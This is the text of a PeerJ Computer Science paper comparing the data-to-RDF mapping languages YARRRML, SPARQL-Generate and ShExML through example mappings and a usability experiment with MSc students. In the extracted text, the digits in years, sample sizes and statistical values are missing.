. /peerj-cs. / https://data.bnf.fr/en/about https://peerj.com https://www.wikidata.org/ http://dx.doi.org/ . /peerj-cs. background we first review available tools and systems for generating rdf from different systems for data representation. these can be divided into one-to-one and many-to-one transformations. we also survey existing studies on the effectiveness of heterogeneous data mapping tools. one to one transformations much research work has been done in this topic where conversions and technologies were proposed to transform from a structured format (e.g., xml, json, csv, databases, etc.) to rdf. from xml to rdf in xml ecosystem many conversions and tools have been proposed: miletic et al. ( ) describe their experience with the transformation of rdf to xml (and vice versa) and from xml schema to rdf schema. deursen et al. ( ) propose a transformation from xml to rdf which is based on an ontology and a mapping document. an approach to convert xml to rdf using xml schema is reported by battle ( ) and battle ( ). thuy et al. ( ) describe how they perform a translation from xml to rdf using a matching between xml schema and rdf schema. the same procedure was firstly proved with a matching between dtd and rdf schema by the same authors in (thuy et al., ). breitling ( ) reports a technique for the transformation between xml and rdf by means of the xslt technology which is applied to astronomy data. another approach that uses xslt attached to schemata definitions is described by sperberg-mcqueen & miller ( ). however, use of xslt for lifting purposes tends to end up in complex and non flexible stylesheets. thus, bischof et al. ( ) present xsparql, a framework that enables the transformation between xml and rdf by using xquery and sparql to overcome the drawbacks of using xslt for these transformations. from json to rdf although in the json ecosystem there are less proposed conversions and tools, there are some works that should be mentioned. müller et al. ( ) present a transformation of a restful api serving interlinked json documents to rdf for sensor data. an rdf production methodology from json data tested on the greek open data repository is presented by theocharis & tsihrintzis ( ). freire, freire & souza ( ) report a tool able to identify json metadata, align them with vocabulary and convert it to rdf; in addition, they identify the most appropriate entity type for the json objects. from tabular form to rdf the importance of csv (along with its spreadsheet counterparts) has influenced work in this ecosystem: ermilov, auer & stadler ( ) present a mapping language whose processor is able to convert from tabular data to rdf. a tool for translating spreadsheets to rdf without the assumption of identical vocabulary per row is described by han et al. ( ). fiorelli et garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al. ( ) report a platform to import and lift from spreadsheet to rdf with a human- computer interface. using sparql . syntax tarql (http://tarql.github.io/) offers an engine to transform from csv to rdf. csvw proposed a w c recommendation to define csv to rdf transformations using a dedicated dsl (tandy, herman & kellogg, ). from databases to rdf along with the xml ecosystem, relational database transformation to rdf is another field: bizer & seaborne ( ) present a platform to access relational databases as a virtual rdf store. a mechanism to directly map relational databases to rdf and owl is described by sequeda, arenas & miranker ( ); this direct mapping produces a owl ontology which is used as the basis for the mapping to rdf. triplify (auer et al., ) allows to publish relational data as linked data converting http-uri requests to relational database queries. one of the most relevant proposals is r rml (das, sundara & cyganiak, ) that became a w c recommendation in . r rml offers a standard language to define conversions from relational databases to rdf. in order to offer a more intuitive way to declare mapping from databases to rdf, stadler et al. ( ) presented sml which bases its mappings into sql views and sparql construct queries. more comprehensive reviews of tools and comparisons of tools for the purpose of lifting from relational databases to rdf are presented by (michel, montagnat & zucker, ; hert, reif & gall, ; sahoo et al., ). many to one transformations many to one transformations is a recent topic which has evolved to overcome the problem that one to one transformations need a different solution for each format and that subsequently must be maintained. source-centric approaches source-centric approaches are those that, even giving the possibility of transforming multiple data sources to multiple serialisation formats, they base their transformation mechanism in one to one transformations. this can deliver optimal results—if exported to rdf—due to rdf compositional property. some of the tools available are: openrefine (http://openrefine.org/) which allows to perform data cleanup and transformation to other formats, datatank (http://thedatatank.com/) which offers transformation of data by means of a restful architecture, virtuoso sponger (http: //vos.openlinksw.com/owiki/wiki/vos/virtsponger) is a middleware component of virtuoso able to transform from a data input format to another serialisation format, rdfizers (http://wiki.opensemanticframework.org/index.php/rdfizers) employs the open semantic framework to offer hundreds of different format converters to rdf. the datalift (scharffe et al., ) framework also offers the possibility of transforming raw data to semantic interlinked data sources. text-based approaches the use of a mapping language as the way to define all the mappings for various data sources was first introduced by rml (dimou et al., ) which extends r rml syntax (turtle garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://tarql.github.io/ http://openrefine.org/ http://thedatatank.com/ http://vos.openlinksw.com/owiki/wiki/vos/virtsponger http://vos.openlinksw.com/owiki/wiki/vos/virtsponger http://wiki.opensemanticframework.org/index.php/rdfizers http://dx.doi.org/ . /peerj-cs. based) to cover heterogeneous data sources. with rml implementations it is possible to gather data from: xml, json, csv, databases and so on; and put them together in the same rdf output. a similar approach was also followed in kr rml (slepicka et al., ) which proposed an alternative interpretation of r rml rules paired with a source-agnostic processor facilitating data cleaning and transformation. to deal with non-relational databases, michel et al. ( ) presented xr rml language which extends r rml and rml specifications. then, sparql-generate (lefrançois, zimmermann & bakerally, ) was proposed which extends sparql syntax to serve as a mapping language for heterogeneous data. this solution has the advantage of using a very well-known syntax in the semantic web community and that its implementation is more efficient than rml main one (i.e., rmlmapper (https://github.com/rmlio/rml-mapper)) (lefrançois, zimmermann & bakerally, ). to offer a simpler solution for users of text-based approaches, yarrrml (heyvaert et al., ) was introduced which offers a yaml based syntax and its processor (https://github.com/rmlio/yarrrml-parser) performs a translation to rml rules. graphical-based approaches graphical tools offer an easier way to interact with the mapping engine and are more accessible to non-expert users. some of the tools mentioned in the previous source- centric approaches section have graphical interfaces, like openrefine and datatank. rmleditor (heyvaert et al., ) offers a graphical interface for the creation of rml rules. related studies some studies have been made to evaluate available tools and languages. lefrançois, zimmermann & bakerally ( ) compared sparql-generate implementation to rmlmapper. their results showed that sparql-generate has a better computational performance when transforming more than csv rows in comparison with rmlmapper. they also concluded that sparql-generate language is easier to learn and use for semantic web practitioners (who are likely already familiar with sparql), but this was based on a limited analysis of the cognitive complexity of query/mappings in the two languages. rmleditor, a graphical tool to generate rml rules was proposed by heyvaert et al. ( ). they performed a usability evaluation for their tool with semantic web experts and non-experts. in the case of semantic web experts they also evaluate the differences between the textual approach (rml) and this new visual one. however, rmleditor was neither compared with other similar tools nor rml with other languages. heyvaert et al. ( ) proposed yarrrml as a human-readable text-based representation which offers an easier layer on top of rml and r rml. however, the authors did not present any evaluation of this language. meester et al. ( ) made a comparative characteristic analysis of different mapping languages. however, a qualitative analysis is not performed and usability is only mentioned in nf ‘‘easy to use by semantic web experts’’ which only yarrrml and sparql-generate achieve. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rmlio/rml-mapper https://github.com/rmlio/yarrrml-parser http://dx.doi.org/ . /peerj-cs. thus, to the best of our knowledge no usability study was performed in these languages which share the easiness of use as one of their goals. therefore, we introduce this study as a first step into the usability evaluation of heterogeneous data mapping languages. presentation of the languages under study in this section we compare yarrrml, sparql-generate and shexml syntax by means of a simple example. these three tools each offer a dsl able to define mappings for heterogeneous data sources like we have seen in the previous section and their designers share the goal to be user friendly (meester et al., ; garcía-gonzález, fernández-Álvarez & gayo, ). rml and similar alternatives are not included in the comparison because they have a verbose syntax very close to the rdf data model. while it might be an interesting solution for users without any programming knowledge but familiar with rdf, we consider it more like a lower level middle language to compile to rather than a language to be used by programmers and data engineers. indeed, yarrrml and shexml engines are able to compile their mappings to rml. for the sake of the example two small files on json and xml are presented in listing and listing respectively. each one of these files define two films with attributes—that could differ on name and structure—that will be translated to the rdf output showed in listing . in this example, and with the aim to keep it simple, different ids are used in each entity; however, it is possible to use objects with same ids that could be merged into a single entity or divided into different new entities depending on users’ intention. listing : json films file { "films": [ { "id": , "title": "inception", "date": " ", "countryoforigin": "usa", "director": "christopher nolan", "screenwriter": "christopher nolan" }, { "id": , "title": "the prestige", "date": " ", "countryoforigin": "usa", "director": "christopher nolan", "screenwriter": ["christopher nolan", "jonathan nolan"] } ] } listing : xml films file dunkirk garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. usa christopher nolan christopher nolan interstellar usa christopher nolan christopher nolan jonathan nolan listing : rdf output @prefix : . : :country "usa" ; :screenwriter "jonathan nolan" , "christopher nolan" ; :director "christopher nolan" ; :name "the prestige" ; :year : . : :country "usa" ; :screenwriter "christopher nolan" ; :director "christopher nolan" ; :name "inception" ; :year : . : :country "usa" ; :screenwriter "jonathan nolan" , "christopher nolan" ; :director "christopher nolan" ; :name "interstellar" ; :year : . : :country "usa" ; :screenwriter "christopher nolan" ; :director "christopher nolan" ; :name "dunkirk" ; :year : . yarrrml listing : yarrrml transformation script for the films example prefixes: ex: "http:// example.com/" mappings: films_json: sources: - [’films.json~jsonpath ’, ’$.films [*]’] s: ex:$(id) po: - [ex:name , $(title)] garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. - [ex:year , ex:$(date)~iri] - [ex:director , $(director )] - [ex:screenwriter , $(screenwriter )] - [ex:country , $(countryoforigin )] films_xml: sources: - [’films.xml~xpath’, ’//film’] s: ex:$(@id) po: - [ex:name , $(name)] - [ex:year , ex:$(year)~iri] - [ex:director , $(director )] - [ex:screenwriter , $(screenwriters/screenwriter )] - [ex:country , $(country )] yarrrml is designed with human-readability in mind which is achieved through a yaml based syntax. listing shows the mappings films_json and films_xml for our films example. each mapping starts with a source definition that contains the query to be used as iterator, e.g., //film. it is followed by the definition of the output given by a subject definition (s:) and a number of associated predicate-object definitions (po:). subject and predicate-object definitions can use ‘‘partial’’ queries relative to the iterator to populate the subject and object values. this way of defining mappings is very close to rml; yarrrml actually does not provide an execution engine but is translated to rml. sparql-generate listing : sparql-generate transformation script for the films example base prefix iter: prefix fun: prefix rdfs: prefix xsd: prefix : prefix dbr: prefix schema: prefix sc: generate { ?id_json :name ?name_json ; :year ?year_json ; :director ?director_json ; :country ?country_json . generate { ?id_json :screenwriter ?screenwriter_json . } iterator iter:split (? screenwriters_json , ",") as ?screenwriters_json_iterator where { bind(replace (? screenwriters_json_iterator , "\\[|\\]|\"", "") as ?screenwriter_json) } . ?id_xml :name ?name_xml ; :year ?year_xml ; :director ?director_xml ; :country ?country_xml . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. generate { ?id_xml :screenwriter ?screenwriter_xml . } iterator iter:xpath (?film_xml , "/film/screenwriters [*]/ screenwriter") as ?screenwriters_xml_iterator where { bind(fun:xpath (? screenwriters_xml_iterator , "/screenwriter/text()") as ?screenwriter_xml) } . } iterator iter:jsonpath( , "$.films [*]") as ?film_json iterator iter:xpath( , "//film") as ?film_xml where { bind(iri(concat("http:// example.com/", str(fun:jsonpath (?film_json ,"$.id")))) as ?id_json) bind(fun:jsonpath (?film_json , "$.title") as ?name_json) bind(fun:jsonpath (?film_json , "$.director") as ?director_json) bind(iri(concat("http:// example.com/", fun:jsonpath (?film_json , "$.date"))) as ?year_json) bind(fun:jsonpath (?film_json , "$.countryoforigin") as ?country_json) bind(fun:jsonpath (?film_json , "$.director") as ?directors_json) bind(fun:jsonpath (?film_json , "$.screenwriter") as ?screenwriters_json) bind(iri(concat("http:// example.com/", fun:xpath (?film_xml ,"/film/@id"))) as ?id_xml) bind(fun:xpath (?film_xml , "/film/name/text()") as ?name_xml) bind(fun:xpath (?film_xml , "/film/director/text()") as ?director_xml) bind(iri(concat("http:// example.com/", fun:xpath (?film_xml , "/film/year/text()"))) as ?year_xml) bind(fun:xpath (?film_xml , "/film/country/text()") as ?country_xml) } sparql-generate is an extension of sparql . for querying heterogeneous data sources and creating rdf and text. it offers a set of sparql binding functions and sparql iterator functions to achieve this goal. the mapping for our films example is shown in listing . the output of the mapping is given within the generate clauses and can use variables and iris, while queries, iri and variable declarations are declared in the where clause. sparql-generate is an expressive language that can be further extended using the sparql . extension system. on the other side, sparql-generate scripts tend to be verbose compared to the other two languages studied in this paper. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. shexml listing : shexml transformation script for the films example prefix : source films_xml_file < https: //raw.githubusercontent.com/herminiogg/ shexml/master/src/test/resources/filmspaper.xml > source films_json_file < https: //raw.githubusercontent.com/herminiogg/ shexml/master/src/test/resources/filmspaper.json > iterator film_xml { field id <@id > field name field year field country field director field screenwriters } iterator film_json { field id field name field year <date > field country <countryoforigin > field director <director > field screenwriters <screenwriter > } expression films <films_xml_file.film_xml union films_json_file.film_json > :films :[films.id] { :name [films.name] ; :year :[films.year] ; :country [films.country] ; :director [films.director] ; :screenwriter [films.screenwriters] ; } shexml, our proposed language, can be used to map xml and json documents to rdf. the shexml mapping for the films example is presented in listing . it consists of source definitions followed by iterator definitions. the latter define structured objects which fields are populated with the results of source queries. the output of the mapping is described using a shape expression (shex) (prud’hommeaux, labra gayo & solbrig, ; boneva, labra gayo & prud’hommeaux, ) which can refer to the previously defined fields. the originality of shexml, compared to the other two languages studied here, is that the output is defined only once even when several sources are used. this is a design choice that allows the user to separate concerns: how to structure the output on the one hand, and how to extract the data on the other hand. comparing languages features in this subsection we compare languages features and what operations are supported or not in each language (see table ). iterators, sources, fields, unions and so on are common to the three languages as they have the same objective. they have different syntaxes, as it can be seen in the three examples, but from a functionality point of view there are no differences. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table features comparison between the three languages. features shexml yarrrml sparql-generate source and output definition defining output shape expression subject and predicate-object definitions generate clause iris generation prefix and value generation expression (concatenation) prefix and value generation expression (array) variable (previous use of con- cat function) or string inter- polation datatypes & lan- guage tags yes yes yes multiple results from a query treated like an array treated like an array need to iterate over the re- sults transformations limited (matchers and string operators). fno hub functions for strings and ex- tension mechanism output formats output rdf rdf rdf and any text-based for- mat translation rml rml no translation offered link between map- pings shape linking and join keyword (do not fully cover yarrrml feature) yes (conditions allowed) nested generate clauses, filter clauses and extension mecha- nism conditional map- ping generation no yes (function and conditional clause) yes (filter clause and exten- sion mechanism) source and output definition and their artefacts: as we saw, the mechanism to define the form of the rdf output has different flavour in the three languages: subject and predicate-object definitions for every source in yarrrml; generate clauses for every source in sparql-generate; a single shape expression in shexml. additionally, the three languages offer slightly different operators for constructing the output values. all of them typically obtain iris by concatenating a source value to some prefix, and reuse literal values as is. yarrrml supports the generation of multiple named graphs whereas sparql-generate can only generate one named graph at a time and shexml only generates rdf datasets. multiple results: the handling of multiple results, like it occurs on the screenwriters case, is different between sparql-generate and the two other languages. in yarrrml and shexml if a query returns multiple results they are treated like a list of them. however, in sparql-generate this functionality must be explicitly declared like it can be seen in listing . it leads to complex iterator definitions like the one used in json screenwriters one. transformations: the possibility of transforming the output to another value by means of a function is something very useful for different purposes when building a knowledge graph. therefore, in yarrrml this is supported through the fno mechanism (meester et al., ) which offers a way to define functions inside mapping languages in a declarative fashion. sparql-generate offers some functions for strings embedded inside the sparql binding functions mechanism; however, it is possible to extend the language through the sparql . extension mechanism. in the case of shexml, only matchers and string operations are offered for transformation purposes. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. other formats output: output format on yarrrml and shexml is limited to rdf; whereas, in sparql-generate it is possible to also generate plain text, enabling the potential transformation to a lot of different formats. in this aspect, sparql-generate presents a much more flexible output. converserly, yarrrml and shexml engines offer a translation of their mappings to rml rules which improves interoperability with other solutions. link to other mappings: in yarrrml there is the possibility to link mappings between them. this functionality is provided by giving the name of the mapping to be linked and the condition that must be satisfied (e.g., id of mapping a equal to id of mapping b). this can be useful when the subject is generated with a certain attribute but this attribute does not appear on the other file so the linking should be done using another attribute. in shexml this can be partially achieved by shape linking—which is a syntactic sugar to avoid repeating an expression twice—and by the join clause which gives an implementation for primary interlinking covering a subset of what is covered with yarrrml mapping linking. in sparql-generate this can be achieved using nested generate clauses and filter clauses. conditional mapping generation: sometimes there is the need to generate triples only in the case that some condition is fulfilled. in yarrrml this is achieved using the conditional clause and a function. in sparql-generate this can be obtained with the sparql . filter clauses and also with the extensibility mechanism offered by the language. in shexml this is not possible currently. further features of sparql-generate: apart from what has been presented in the previous point, sparql-generate, as being based on sparql . , offers more expressiveness than the other two languages. one possibility that emerges from that is the use of defined variables. for example, it is possible to define an iterator of numbers and then use that numbers to request different parts of an api. this versatility enables the creation of very complex and rich scripts that can cover a lot of use cases. it is natural to expect that learning to use the full capabilities of sparql-generate is complex, as the language offers a lot of features. in our experiments, however, only some basic features of the language were required and, as is shown in ‘results’, it appears that sparql-generate design did not help test subjects to solve the proposed tasks easily. methodology in order to test our hypothesis that shexml is easier for first-time users only experienced in programming and the basics of linked data, an experiment was carried out. the university of oviedo granted ethical approval to carry out the described study. verbal consent was requested before starting the experiment. experiment design the selected tools were yarrrml (http://rml.io/yarrrml/), sparql-generate (https://ci. mines-stetienne.fr/sparql-generate/) and shexml (http://shexml.herminiogarcia.com/). we decided not to include rml (http://rml.io/) and similar alternatives for the same reason mentioned on ‘presentation of the languages under study’. three manuals were designed for the students based on the example about films that described how the integration can be garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://rml.io/yarrrml/ https://ci.mines-stetienne.fr/sparql-generate/ https://ci.mines-stetienne.fr/sparql-generate/ http://shexml.herminiogarcia.com/ http://rml.io/ http://dx.doi.org/ . /peerj-cs. material can be consulted on: https: //github.com/herminiogg/shexml-paper- -data/tree/master/experiment- material. done with each tool. the experiment was designed to be performed in each tool dedicated online environment, which are available through the internet as a webpage. in addition, a small manual was developed to guide the students along the experiment and to inform them about the input files and which are the expected outputs . this manual contained two tasks to perform during the experiment which were designed to be performed sequentially, i.e., the student should finish the first task before starting with the second one. the first task was the mapping and integration of two files (json and xml) with information about books which should be mapped in a unique rdf graph. the final output should be equal to the one given in the guide. the second task was to modify the script done in the previous task so that the prices are separated and can be compared between markets. in other words, that multiple prices are tagged individually referring to the market where the specific price was found, like they were in the input files. this second task gives us an intuition on how easy is to modify an existing set of data mapping rules in each language. the study was designed as a mixed method approach, including a quantitative analysis and a qualitative analysis. for the quantitative analysis measures, mousotron (http://www.blacksunsoftware.com/mousotron.html) was used which allows to register the number of keystrokes, the distance travelled by the mouse and so on. for the qualitative analysis two office forms were used with questions based on a likert scale (see questions in table ). in addition, the elapsed time was calculated from timestamps in the office forms. conduction the sample consisted on students (four women and men) of the msc in web engineering first-year course (out of two years) at the university of oviedo (http://miw.uniovi.es/). most of them have a bachelor degree ( ects credits) in computer science or similar fields. they were receiving a semantic web course of two weeks—a total of hours ( hours per day)—where they were introduced to semantic technologies like: rdf, sparql, shex, etc. before this course they had not previous knowledge on semantic web technologies. regarding prior knowledge of yaml by subjects, even though it is normally known and used by developers, we could not assure it. the experiment was hosted the final day of the course. the experiment was conducted in their usual classroom and with their whole-year- assigned computers. so that they were in a confortable environment and with a computer they are familiar with. the three tools were assigned to the students in a random manner. each student received the printed manual for its assigned tool and they were given a time of minutes to read it, test the language in the online environment, and ask doubts and questions. once these minutes were elapsed the printed experiment guide was given to the students and they were explained about the experiment proceeding with indications about mousotron operation. in particular the procedure followed to perform the whole experiment was: . open the assigned tool on the dedicated webpage and clear the given example. . open mousotron and reset it. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/herminiogg/shexml-paper- -data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper- -data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper- -data/tree/master/experiment-material https://github.com/herminiogg/shexml-paper- -data/tree/master/experiment-material https://peerj.com http://www.blacksunsoftware.com/mousotron.html http://miw.uniovi.es/ http://dx.doi.org/ . /peerj-cs. table statements to evaluate by the students based on a point likert scale. questionnaire statement obtained variable the experience with the tool was satisfactory general satisfaction level the tool was easy to use easiness of use the mapping definitions was easy mapping definition easiness the language was easy to learn learnability i find that these tool can be useful in my work applicability the coding in this tool was intuitive intuitiveness the language design leads to commit some errors error proneness the error messages were useful to solve the problems error reporting usefulness it was easy to define different predicates for the price modifiability . proceed with task (start time registered for elapsed time calculation). . once task is finished, capture mousotron results (screenshot) and fill the first office questionnaire. . reset mousotron and proceed with task . . once task is finished, capture mousotron results (screenshot) and fill the second office questionnaire. analysis the quantitative results were dump into an excel sheet and anonymised. although many results can be used as given by the students, some of them need to be calculated. this is the case of elapsed time (on both tasks), completeness percentage and precision. elapsed time in the first task (tt ) was calculated as the subtraction of questionnaire beginning time (stq ) and experiment start time (ste), i.e., (tt = stq −ste). elapsed time in the second task (tt ) was calculated as the subtraction of questionnaire ending time (etq ) and questionnaire beginning time (stq ), i.e., (tt = stq −etq ). completeness percentage was calculated from three measures: the proportion of correctly generated triples contributed %, the proportion of data correctly translated contributed % and the proportion of correctly generated prefixes and datatypes as a %. this design gives more importance to the structure, which is the main goal when using these tools. other aspects, like correct data (i.e., the object part of a triple), prefixes (i.e., using the correct predicate for the subject, the predicate and the object in case of an iri) and the datatype (i.e., putting the correct xsd type in case of a literal object) are a little less valued as these errors could come more easily from a distraction or an oversight. let cp be the completeness percentage, t the number of triples, d the number of data gaps and p&dt the number of prefixes and datatypes, so the calculation of the completeness percentage can be expressed as: cp = . ∗ ttotal−tgenerated ttotal + . ∗ dtotal−dgenerated dtotal + . ∗ p&dttotal−p&dtgenerated p&dttotal . finally, precision was calculated as the division of current student elapsed time by minimum elapsed time of all students, multiplied by the completeness percentage. this precision formulation gives us an intuition on how fast was some student in comparison garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with the fastest student and with a correction depending on how well his/her solution was. let tsn be the elapsed time of student n and cpsn the completeness percentage of student n calculated with the previous formula. precisionsn= tsn min({ts ,...,tsn}) ∗cpsn. the results of the qualitative analysis were only anonymised as they can be directly used from the office output. for the analysis the ibm spss version was used. we planned a one way anova test within the three groups in the quantitative analysis where a normal distribution was found and the kruskal-wallis test where not. the qualitative analysis comparison between three groups was established using the kruskal-wallis test. the report and analysis of the results was made using field ( ) as guidance and using the suggested apa style as a standard manner to report statistical results. threat to validity in this experiment we have identified the following threats to its validity. internal validity we have identified the following internal validity threats in the experiment design: • more expertise in some specific tool: in semantic web area—as in other areas—people tend to be more expert in some specific technologies and languages. the derived risk is that this expertise can have an influence on final results. to alleviate this we have selected msc students that are studying the same introductory semantic web course and we have assigned the tools in a random manner. • not homogeneous group: it is possible that the selected group is not homogeneous on skills and previous knowledge. to mitigate this we have applied the same measures as for the previous threat: students of a semantic web course and a randomised tool assignment. • unfamiliar environment: in usability studies, unfamiliar environments can play a role on final conclusions. therefore, we opted to run the experiment in a well-known environment for the students, that is, their whole-year classroom. • more guide and information about one tool: as we have designed one of the languages, it could lead to a bias in information delivery. to try to mitigate this threat we developed three identical manuals for each tool. questions and doubts were answered equally for all the students and tools. external validity following the measures taken in the internal validity threats we identified the corresponding external validity ones: • very focused sample: as we have restricted the profile of the sample to students of a msc course which are more or less within the same knowledge level, there is the risk that these findings cannot be extrapolated for other samples or populations. it is possible that for semantic web practitioners—with different interests and expertises—these findings garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. original datasets available on: https: //github.com/herminiogg/shexml-paper- -data/tree/master/datasets. are not applicable. however, the intention of this study was to evaluate usability with first-time users as a first step to guide future studies. results from the students of the sample, in the first task, three of them left the experiment without making any questionnaire, two for sparql-generate and one for yarrrml. in the second task, only seven out of the students made the questionnaire, six for shexml and for yarrrml. the statistical analysis was made using the ibm spss software, version . task : as previously stated, the number of students that finished—correctly or not—the proposed task was . descriptive statistics can be seen in table . comparison of three groups was made by means of a one way anova which results showed significant differences on elapsed seconds f( , )= . , p= . , ω= . . as completeness percentage and precision are not following a normal distribution on sparql-generate group (w ( )= . , p= . and w ( )= . , p= . ), the comparison was established by means of the kruskal-wallis test which showed significant differences in both variables (h( )= . , p= . and h( )= . , p= . ). post hoc test for elapsed seconds using the gabriel’s criterion showed significant differences between shexml group and yarrrml group (p= . ). post hoc test for completeness percentage and precision using the bonferroni’s criterion showed significant differences between shexml and sparql- generate (p= . , r = . and p= . , r = . ). likert scale questionnaire results (α= , ) (see fig. ) were analysed using kruskal-wallis test which resulted in significant differences between groups for variables general satisfaction level (h( )= . , p= . ), easiness of use (h( )= . , p= . ), mapping definition easiness (h( )= . , p= . ) and learnability (h( )= . , p= . ). bonferroni’s criterion was used as post hoc test for the variables with significant differences. for general satisfaction level significant differences were found between shexml and yarrrml (p= . , r = . ). for easiness of use significant differences were found between shexml and yarrrml (p= . , r = . ). for mapping definition easiness significant differences were found between shexml and sparql-generate (p= . , r = . ) and between shexml and yarrrml (p= . , r = . ). for learnability significant differences were found between shexml and sparql-generate (p= . , r = . ) and between shexml and yarrrml (p= . , r = . ). task : in this task only seven students reached this step: for shexml and for yarrrml. descriptive statistics of this task can be seen in table . no significant differences were found in any of the variables. in subjective variable analysis (see fig. ) no significant differences were found. discussion statistical results discussion results of task show that variables like keystrokes, left button clicks, right button clicks, mouse wheel scroll and meters travelled by the mouse, do not have a significant garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/herminiogg/shexml-paper- -data/tree/master/datasets https://github.com/herminiogg/shexml-paper- -data/tree/master/datasets https://github.com/herminiogg/shexml-paper- -data/tree/master/datasets https://peerj.com http://dx.doi.org/ . /peerj-cs. table descriptive statistics for task objective results where n is the sample size, x̄ is the mean, s is the standard deviation, max is the maxi- mum value of the sample and min is the minimum value of the sample. (*) means significant differences between groups and (a) means significant differences in the post hoc test between the marked groups at the level of significance (α = . ). differences in totals are due to malfunctions while operating capture software. measure group n x̄ s max min elapsed seconds (*) shexml (a) , . . , yarrrml (a) , . . , , sparql-generate , . . , , total , . . , keystrokes shexml , . . , yarrrml , . , sparql-generate , . . , , total , . . , left button clicks shexml . . yarrrml . . sparql-generate . total . . right button clicks shexml . . yarrrml . . sparql-generate . . total . . mouse wheel scroll shexml . yarrrml . . , sparql-generate . total . . , meters travelled by the mouse shexml . . . yarrrml . . . sparql-generate . . . total . . . completeness percentage (*) shexml (a) . . . yarrrml . . . sparql-generate (a) . . . total . . precision (*) shexml (a) . . . yarrrml . . . sparql-generate (a) . . . total . . variability depending on the used tool. this suggests that web interfaces used as online development environments are more or less homogeneous and do not have an impact on the development of the scripts. however, keystrokes variable results should be considered with caution because for sparql-generate the mean of completeness percentages was very low; therefore, achieving a final solution may involve more keystrokes. on the other hand, elapsed seconds, completeness percentage and precision show significant differences between groups which suggest that the selected language has an influence on these variables. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (a) (*) (*) (*) (*) (a) (a) (a) (a) (a) (a) (b) (b) (b) (b) - - - - - - - - figure task results for likert scale questionnaire where results are divided into questions and groups. (*) means significant differences between groups and (a) and (b) means significant differences in the post hoc test between the marked groups at the level of significance α= . . full-size doi: . /peerjcs. /fig- moreover, we can see that elapsed seconds has a medium size effect (ω= . ). post hoc results show that there are significant differences between shexml and yarrrml which suggests that yarrrml users tend to need more time than shexml users for these tests. in the case of comparisons with sparql-generate there are not significant differences which can be due to the small sample size and the low completeness percentage. differences between shexml and sparql-generate for completeness percentage and precision suggest that sparql-generate users were not able to achieve working solutions as shexml users, which have the highest mean on both variables. however, between shexml and yarrrml groups there were no significant differences which is in line with the great variability of those two variables. results of task do not show any significant difference between the shexml group and the yarrrml group. this can be explained by the low sample size in the yarrrml group where only one individual made this step. however, completeness percentage and precision show us that some students did achieve a correct solution with shexml, whereas in yarrrml group and in sparql-generate group they did not. this leads to the conclusion that only the shexml group managed to find a working solution to both garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table descriptive statistics for task objective results where n is the sample size, x̄ is the mean, s is the standard deviation, max is the maximum value of the sample and min is the minimum value of the sample. differences in totals are due to malfunctions while operating capture software. measure group n x̄ s max min elapsed seconds shexml . . yarrrml total . . keystrokes shexml . . yarrrml total . . left button clicks shexml . . yarrrml total . . right button clicks shexml . . yarrrml total . . mouse wheel scroll shexml . . yarrrml total . meters travelled by the mouse shexml . . . yarrrml . . . total . . . completeness percentage shexml . . yarrrml total . . precision shexml . . yarrrml total . . proposed tasks. nevertheless, these conclusions must be validated with bigger experiments to have statistical confidence. the differences in completeness percentage and precision between shexml and sparql-generate and also between shexml and yarrrml in elapsed seconds can lead us to the conclusion that usability on first-time users is improved by using shexml over the other two languages, which answers rq . moreover, this conclusion is reinforced by the situation that in task neither yarrrml nor sparql-generate users were able to find a solution to this task. regarding the subjective analysis, significant differences were found between groups in general satisfaction level, mapping definition easiness easiness of use and learnability (as perceived by the students). on general satisfaction level significant differences were found between shexml and yarrrml which indicates that shexml users were more satisfied with the overall use of the tool respect to the yarrrml users. differences between sparql-generate users and the two other groups could not be established due to their low completeness percentage and precision rates. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure task results for likert scale questionnaire where results are divided into the two groups. full-size doi: . /peerjcs. /fig- in the case of easiness of use significant differences were found between shexml and yarrrml which suggests that shexml users found this language easier to use than yarrrml users did with their language counterpart. in this case, like in the previous variable, significant differences could not be established between sparql-generate and the two other groups due to low completeness percentage. in mapping definition easiness differences were established between shexml group and yarrrml group and between shexml group and sparql-generate group which indicates that shexml users found mappings easier to define in shexml than in the other two languages. we also note that users did not find differences on mapping definition easiness between yarrrml and sparql-generate, this may be because sparql- generate users did not use the whole language. on learnability significant differences were found between shexml and sparql- generate and between shexml and yarrrml which suggests that the users found easier to learn shexml than the other two languages. however, no significant differences were found between yarrrml and sparql-generate which seems strange due to the difference of verbosity between the two languages. differences on subjective analysis between shexml and yarrrml on general satisfaction level, mapping definition easiness, easiness of use and learnability, and between shexml and sparql-generate on mapping definition easiness and learnability comes to corroborate what we have elucidated with the objective analysis answering rq . garcía-gonzález et al. ( ), peerj comput. sci., 